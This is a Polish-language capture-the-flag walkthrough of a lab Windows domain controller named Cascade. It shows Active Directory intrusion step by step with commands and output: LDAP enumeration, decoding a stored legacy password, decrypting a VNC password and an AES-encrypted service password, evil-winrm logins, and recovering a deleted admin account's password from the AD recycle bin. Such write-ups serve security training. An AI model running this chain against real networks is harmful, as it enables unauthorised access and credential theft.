Cascade

Nmap

nmap -sC -sV -T5 -p- 10.10.10.182

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-21 13:07:08Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m28s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-21T13:08:00
|_  start_date: 2020-05-21T04:48:14

User

Sprawdzam LDAP

ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" > ldap.txt

Pokazuje bardzo dużo informacji dlatego przekierowałem to do pliku żeby było wygodniej szukać
i wyszukiwałem użytkowników i ewentualne hasła

CascGuest@cascade.local
arksvc@cascade.local
s.smith@cascade.local
r.thompson@cascade.local    <-- clk0bjVldmE=
util@cascade.local
j.wakefield@cascade.local
s.hickson@cascade.local
j.goodhand@cascade.local
a.turnbull@cascade.local
e.crowe@cascade.local
b.hanson@cascade.local
d.burman@cascade.local
BackupSvc@cascade.local
j.allen@cascade.local
i.croft@cascade.local

w danych jednego użytkownika znalazłem hasło base64
w parametrze “cascadeLegacyPwd”

echo "clk0bjVldmE=" | base64 -d
rY4n5eva
user: "r.thompson"
password: "rY4n5eva"
smbclient -L \\\\10.10.10.182\\ -U r.thompson%rY4n5eva

WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Audit$          Disk      
	C$              Disk      Default share
	Data            Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva 

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 15 21:50:33 2020
  ..                                  D        0  Wed Jan 15 21:50:33 2020
  MapAuditDrive.vbs                   A      258  Wed Jan 15 21:50:15 2020
  MapDataDrive.vbs                    A      255  Wed Jan 15 21:51:03 2020
smbclient \\\\10.10.10.182\\print$ -U r.thompson%rY4n5eva

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 14 06:37:10 2009
  ..                                  D        0  Tue Jul 14 06:37:10 2009
  color                               D        0  Tue Jul 14 06:37:10 2009
  IA64                                D        0  Tue Jul 14 05:58:30 2009
  W32X86                              D        0  Tue Jul 14 05:58:30 2009
  x64                                 D        0  Mon Jan 13 03:09:11 2020
smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 03:27:34 2020
  ..                                  D        0  Mon Jan 27 03:27:34 2020
  Contractors                         D        0  Mon Jan 13 01:45:11 2020
  Finance                             D        0  Mon Jan 13 01:45:06 2020
  IT                                  D        0  Tue Jan 28 18:04:51 2020
  Production                          D        0  Mon Jan 13 01:45:18 2020
  Temps                               D        0  Mon Jan 13 01:45:15 2020

Sporo plików do oglądania najciekawsze są jednak w “Data”

firefox "./IT/Email Archives/Meeting_Notes_June_2018.html"
cat './IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log'
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
cat ./IT/Temp/s.smith/VNC\ Install.reg 

��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
...
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...

Widzimy że można użyć usera TempAdmin i znalazłem hex hasła oraz info, że jest to do jakiegoś serwera VNC

google podpowiada że trzeba wyrzucić przecinki z hasła i jest decrypter do ściągnięcia:

https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/

password - "sT333ve2"
/opt/evil-winrm/evil-winrm.rb -i 10.10.10.182 -u s.smith -p "sT333ve2" 

*Evil-WinRM* PS C:\Users\s.smith\Documents> cat ../Desktop/user.txt
844d54a03ee2***796e1107e8c3

Root

smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2  

smb: \> ls
  .                                   D        0  Wed Jan 29 18:01:26 2020
  ..                                  D        0  Wed Jan 29 18:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 21:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 18:00:20 2020
  DB                                  D        0  Tue Jan 28 21:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 23:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 06:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 06:38:38 2019
  x64                                 D        0  Sun Jan 26 22:25:27 2020
  x86                                 D        0  Sun Jan 26 22:25:27 2020
smbget -R smb://10.10.10.182/Audit$ -U s.smith

Password for [s.smith] connecting to //Audit$/10.10.10.182: 
Using workgroup WORKGROUP, user s.smith
smb://10.10.10.182/Audit$/CascAudit.exe                                                                                                                                                                                                                                                               
smb://10.10.10.182/Audit$/CascCrypto.dll                                                                                                                                                                                                                                                              
smb://10.10.10.182/Audit$/DB/Audit.db                                                                                                                                                                                                                                                                 
smb://10.10.10.182/Audit$/RunAudit.bat                                                                                                                                                                                                                                                                
smb://10.10.10.182/Audit$/System.Data.SQLite.dll                                                                                                                                                                                                                                                      
smb://10.10.10.182/Audit$/System.Data.SQLite.EF6.dll                                                                                                                                                                                                                                                  
smb://10.10.10.182/Audit$/x64/SQLite.Interop.dll                                                                                                                                                                                                                                                      
smb://10.10.10.182/Audit$/x86/SQLite.Interop.dll                                                                                                                                                                                                                                                      
Downloaded 3,33MB in 28 seconds

W bazie danych znajdujemy kolejne Credentiale (hasło w base64)

Username "ArkSvc"
Password "BQO5l5Kj9MdErXx6Q6AGOw=="

następnie przy pomocy dnSpy znajdujemy informacje na temat klucza, IV, trybu CBC i AES
wylistuję tylko skróty

CascAudit.exe -> CascAudiot -> MainModule
...
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
...

CascCrypto.dll -> CascCrypto -> Crypto
...
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = 1;
...

na ratunek przychodzi CyberChef

login    "ArkSvc"
password "w3lc0meFr31nd"
/opt/evil-winrm/evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p "w3lc0meFr31nd"
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Mamy uprawnienia grupy AD recycle bin a wcześniej było info w e-mailu o usuniętym koncie admina “TempAdmin” oraz w bazie danych było jakieś usunięte konto

https://github.com/samratashok/ADModule

jest instrukcja jak się obsługiwać modułem do zarządzania AD

https://docs.microsoft.com/en-us/powershell/module/addsadministration/get-adobject?view=win10-p

Get-ADObject -Filter 'isDeleted -eq $True' -IncludeDeletedObjects -Properties *

...
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
...
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d

"baCT3r1aN00dles"

Nie da się zalogować na konto TempAdmin, ale w e-mailu napisali, że jest to te same hasło co do admina

/opt/evil-winrm/evil-winrm.rb -i 10.10.10.182 -u Administrator -p "baCT3r1aN00dles"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
4067bfcb8d568***070d219a6869

Leave a Comment